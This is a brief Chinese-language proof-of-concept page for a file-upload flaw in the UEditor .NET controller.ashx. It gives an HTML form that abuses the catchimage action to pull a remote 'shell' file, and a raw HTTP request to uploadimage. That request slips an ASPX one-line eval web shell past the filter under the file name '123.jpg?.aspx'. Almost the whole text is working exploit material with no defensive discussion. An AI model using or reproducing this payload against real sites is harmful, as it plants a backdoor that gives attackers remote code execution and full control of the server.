漏洞位置
/scripts/ueditor/net/controller.ashx?action=uploadimage
漏洞POC
本地上传Poc
1
2
3
4
| <form action="http://www.xxxxx.com/ueditor/net/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST">
shell addr: <input type="text" name="source[]" />
<input type="submit" value="Submit" />
</form>
|
HTTP请求
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
| POST /scripts/ueditor/net/controller.ashx?action=uploadimage HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------139961334010512
Content-Length: 266
Connection: close
Cookie: acw_tc=76b20f4315759493974777367eaf0c66d856b23bd121ba2ceaed703d7277aa
Upgrade-Insecure-Requests: 1
-----------------------------139961334010512
Content-Disposition: form-data; name="upfile"; filename="123.jpg?.aspx"
Content-Type: image/jpeg
<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
-----------------------------139961334010512--
|
